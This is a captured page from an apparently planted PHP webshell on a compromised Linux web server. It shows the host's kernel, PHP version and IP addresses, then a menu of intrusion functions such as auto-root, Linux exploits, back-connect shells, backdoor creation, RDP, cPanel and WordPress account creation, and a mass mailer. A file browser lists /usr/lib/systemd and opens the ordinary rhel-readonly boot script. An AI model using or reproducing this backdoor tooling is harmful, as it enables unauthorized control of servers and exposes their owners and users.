Linux node5458.myfcloud.com 6.10.2-x86_64-linode165 #1 SMP PREEMPT_DYNAMIC Tue Jul 30 15:03:21 EDT 2024 x86_64
Apache
: 45.79.123.194 | : 18.219.10.41
16 Domain
7.4.33
addify5
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
import-pubring.gpg
9.33
KB
-rw-r--r--
rhel-autorelabel
2.31
KB
-rwxr-xr-x
rhel-configure
399
B
-rwxr-xr-x
rhel-dmesg
110
B
-rwxr-xr-x
rhel-domainname
158
B
-rwxr-xr-x
rhel-import-state
1.03
KB
-rwxr-xr-x
rhel-loadmodules
233
B
-rwxr-xr-x
rhel-readonly
5.77
KB
-rwxr-xr-x
systemd
1.56
MB
-rwxr-xr-x
systemd-ac-power
23.41
KB
-rwxr-xr-x
systemd-activate
68.52
KB
-rwxr-xr-x
systemd-backlight
73.02
KB
-rwxr-xr-x
systemd-binfmt
60.73
KB
-rwxr-xr-x
systemd-bootchart
125.05
KB
-rwxr-xr-x
systemd-cgroups-agent
35.91
KB
-rwxr-xr-x
systemd-coredump
129.86
KB
-rwxr-xr-x
systemd-cryptsetup
101.28
KB
-rwxr-xr-x
systemd-fsck
331.23
KB
-rwxr-xr-x
systemd-hibernate-resume
39.95
KB
-rwxr-xr-x
systemd-hostnamed
367.16
KB
-rwxr-xr-x
systemd-importd
367.75
KB
-rwxr-xr-x
systemd-initctl
309.84
KB
-rwxr-xr-x
systemd-journald
338.05
KB
-rwxr-xr-x
systemd-localed
375.22
KB
-rwxr-xr-x
systemd-logind
624.84
KB
-rwxr-xr-x
systemd-machine-id-commit
52.19
KB
-rwxr-xr-x
systemd-machined
482.01
KB
-rwxr-xr-x
systemd-modules-load
64.8
KB
-rwxr-xr-x
systemd-pull
183.14
KB
-rwxr-xr-x
systemd-quotacheck
43.96
KB
-rwxr-xr-x
systemd-random-seed
48.13
KB
-rwxr-xr-x
systemd-readahead
97.51
KB
-rwxr-xr-x
systemd-remount-fs
56.52
KB
-rwxr-xr-x
systemd-reply-password
35.93
KB
-rwxr-xr-x
systemd-rfkill
60.74
KB
-rwxr-xr-x
systemd-shutdown
146.76
KB
-rwxr-xr-x
systemd-shutdownd
64.52
KB
-rwxr-xr-x
systemd-sleep
89.16
KB
-rwxr-xr-x
systemd-socket-proxyd
105.52
KB
-rwxr-xr-x
systemd-sysctl
64.83
KB
-rwxr-xr-x
systemd-sysv-install
40.22
KB
-rwxr-xr-x
systemd-timedated
375.91
KB
-rwxr-xr-x
systemd-udevd
406.45
KB
-rwxr-xr-x
systemd-update-done
44.07
KB
-rwxr-xr-x
systemd-update-utmp
309.87
KB
-rwxr-xr-x
systemd-user-sessions
44.16
KB
-rwxr-xr-x
systemd-vconsole-setup
52.2
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rhel-readonly
#!/bin/bash # # Set up readonly-root support. # . /etc/init.d/functions # We need to initialize the $HOSTNAME variable by ourselves now: # (It was previously done for RHEL-6 branch, but got lost in time.) HOSTNAME="$(hostname)" # Check SELinux status SELINUX_STATE= if [ -e "/sys/fs/selinux/enforce" ] && [ "$(cat /proc/self/attr/current)" != "kernel" ]; then if [ -r "/sys/fs/selinux/enforce" ] ; then SELINUX_STATE=$(cat "/sys/fs/selinux/enforce") else # assume enforcing if you can't read it SELINUX_STATE=1 fi fi selinux_fixup() { if [ -n "$SELINUX_STATE" ] && [ -e "$1" ]; then restorecon -R "$1" fi } # Only read this once. [ -z "${cmdline}" ] && cmdline=$(cat /proc/cmdline) READONLY= if [ -f /etc/sysconfig/readonly-root ]; then . /etc/sysconfig/readonly-root fi if strstr "$cmdline" readonlyroot ; then READONLY=yes [ -z "$RW_MOUNT" ] && RW_MOUNT=/var/lib/stateless/writable [ -z "$STATE_MOUNT" ] && STATE_MOUNT=/var/lib/stateless/state fi if strstr "$cmdline" noreadonlyroot ; then READONLY=no fi MOUNTS=() if [ "$READONLY" = "yes" -o "$TEMPORARY_STATE" = "yes" ]; then add_mount() { mnt=${1%/} MOUNTS=("${MOUNTS[@]}" "$mnt") } cp_empty() { if [ -e "$1" ]; then echo "$1" | cpio -p -vd "$RW_MOUNT" &>/dev/null add_mount $1 fi } cp_dirs() { if [ -e "$1" ]; then mkdir -p "$RW_MOUNT$1" find "$1" -type d -print0 | cpio -p -0vd "$RW_MOUNT" &>/dev/null add_mount $1 fi } cp_files() { if [ -e "$1" ]; then cp -a --parents "$1" "$RW_MOUNT" add_mount $1 fi } # Common mount options for scratch space regardless of # type of backing store mountopts= # Scan partitions for local scratch storage rw_mount_dev=$(blkid -t LABEL="$RW_LABEL" -l -o device) bindmountopts= [ "$SLAVE_MOUNTS" = "yes" ] && bindmountopts="--make-slave" # First try to mount scratch storage from /etc/fstab, then any # partition with the proper label. If either succeeds, be sure # to wipe the scratch storage clean. If both fail, then mount # scratch storage via tmpfs. if mount $mountopts "$RW_MOUNT" > /dev/null 2>&1 ; then rm -rf "$RW_MOUNT" > /dev/null 2>&1 elif [ x$rw_mount_dev != x ] && mount $rw_mount_dev $mountopts "$RW_MOUNT" > /dev/null 2>&1; then rm -rf "$RW_MOUNT" > /dev/null 2>&1 else mount -n -t tmpfs $RW_OPTIONS $mountopts none "$RW_MOUNT" fi for file in /etc/rwtab /etc/rwtab.d/* /run/initramfs/rwtab ; do is_ignored_file "$file" && continue [ -f $file ] && while read type path ; do case "$type" in empty) cp_empty $path ;; files) cp_files $path ;; dirs) cp_dirs $path ;; *) ;; esac done < <(cat $file) done for m in "${MOUNTS[@]}"; do prefix=0 for mount_point in "${MOUNTS[@]}"; do [[ $m = $mount_point ]] && continue if [[ $m =~ ^$mount_point/.* ]] ; then prefix=1 break fi done [[ $prefix -eq 1 ]] && continue mount -n --bind $bindmountopts "$RW_MOUNT$m" "$m" selinux_fixup "$m" done # Use any state passed by initramfs [ -d /run/initramfs/state ] && cp -a /run/initramfs/state/* $RW_MOUNT # In theory there should be no more than one network interface active # this early in the boot process -- the one we're booting from. # Use the network address to set the hostname of the client. This # must be done even if we have local storage. ipaddr= if [ "$HOSTNAME" = "localhost" -o "$HOSTNAME" = "localhost.localdomain" ]; then ipaddr=$(ip addr show to 0.0.0.0/0 scope global | awk '/[[:space:]]inet / { print gensub("/.*","","g",$2) }') for ip in $ipaddr ; do HOSTNAME= eval $(ipcalc -h $ipaddr 2>/dev/null) [ -n "$HOSTNAME" ] && { hostname ${HOSTNAME} ; break; } done fi # Clients with read-only root filesystems may be provided with a # place where they can place minimal amounts of persistent # state. SSH keys or puppet certificates for example. # # Ideally we'll use puppet to manage the state directory and to # create the bind mounts. However, until that's all ready this # is sufficient to build a working system. # First try to mount persistent data from /etc/fstab, then any # partition with the proper label, then fallback to NFS state_mount_dev=$(blkid -t LABEL="$STATE_LABEL" -l -o device) if mount $mountopts $STATE_OPTIONS "$STATE_MOUNT" > /dev/null 2>&1 ; then /bin/true elif [ x$state_mount_dev != x ] && mount $state_mount_dev $mountopts "$STATE_MOUNT" > /dev/null 2>&1; then /bin/true elif [ ! -z "$CLIENTSTATE" ]; then # No local storage was found. Make a final attempt to find # state on an NFS server. mount -t nfs $CLIENTSTATE/$HOSTNAME $STATE_MOUNT -o rw,nolock fi if [ -w "$STATE_MOUNT" ]; then mount_state() { if [ -e "$1" ]; then [ ! -e "$STATE_MOUNT$1" ] && cp -a --parents "$1" "$STATE_MOUNT" mount -n --bind $bindmountopts "$STATE_MOUNT$1" "$1" fi } for file in /etc/statetab /etc/statetab.d/* ; do is_ignored_file "$file" && continue [ ! -f "$file" ] && continue if [ -f "$STATE_MOUNT/$file" ] ; then mount -n --bind $bindmountopts "$STATE_MOUNT/$file" "$file" fi for path in $(grep -v "^#" "$file" 2>/dev/null); do mount_state "$path" selinux_fixup "$path" done done if [ -f "$STATE_MOUNT/files" ] ; then for path in $(grep -v "^#" "$STATE_MOUNT/files" 2>/dev/null); do mount_state "$path" selinux_fixup "$path" done fi fi if mount | grep -q /var/lib/nfs/rpc_pipefs ; then mount -t rpc_pipefs sunrpc /var/lib/nfs/rpc_pipefs fi fi
Close